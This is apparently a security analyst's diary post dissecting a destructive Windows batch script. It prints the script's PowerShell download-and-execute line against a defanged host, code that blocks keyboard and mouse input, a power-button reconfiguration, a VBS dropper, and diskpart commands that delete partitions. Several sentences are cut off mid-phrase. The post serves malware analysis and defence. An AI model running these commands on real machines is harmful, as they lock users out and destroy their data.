I found another script that performs malicious actions. It’s a simple batch file (.bat) that is not obfuscated but it has a very low VT score (1/53). The file hash is cc8ae359b629bc40ec6151ddffae21ec8cbfbcf7ca7bda9b3d9687ca05b1d584. The file is detected by only one antivirus that triggered on the “shutdown.exe” located at the end of the script! Why is this script annoying people? Because it uses the
powershell -exec bypass -w h -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('hxxps://phoenixthrush[.]com/payloads/scripts/disabling_user_input/disable_user_input.ps1')|iex"
Here is the PowerShell code downloaded and executed:
# requires Administrator $code = @' [DllImport("user32.dll")] public static extern bool BlockInput(bool fBlockIt); '@ $userInput = Add-Type -MemberDefinition $code -Name Blocker -Namespace UserInput -PassThru # block user input $null = $userInput::BlockInput($true)
If you don’t know what is the purpose of the
Tip: most people don’t know but there is a way to “unlock” the computer: Just press Ctrl-Alt-Delete then select "Cancel".
The next one-liner used reconfigures the way the power button works:
powershell -exec bypass -w h -c "powercfg -setacvalueindex scheme_balanced sub_buttons pbuttonaction 0"
powercfg.exe is a standard tool provided by Microsoft that allows interaction with power schemes.
Then, the script drops two scripts on the target:
set WshShell = wscript.createobject("WScript.shell") WshShell.run """C:\Windows\Temp\x.bat"" ", 0, true
The file x.bat is a long script that destroys the victim's computer. Here are some pieces of code:
:: deleting some Windows partitions echo Select Disk 0 >> y.txt echo Select Partition 2 >> y.txt echo Delete Partition Override >> y.txt echo Select Partition 4 >> y.txt echo Delete Partition Override >> y.txt diskpart /s y.txt >nul
:: creating a message box echo msgbox"stupid b*tch",0 , "get rekt, ur PC has been f*cked" >> y.vbs
That's the first time that I see a call to
Xavier Mertens (@xme)
Jan 4th 2022
|Thread locked Subscribe||
Jan 4th 2022
9 months ago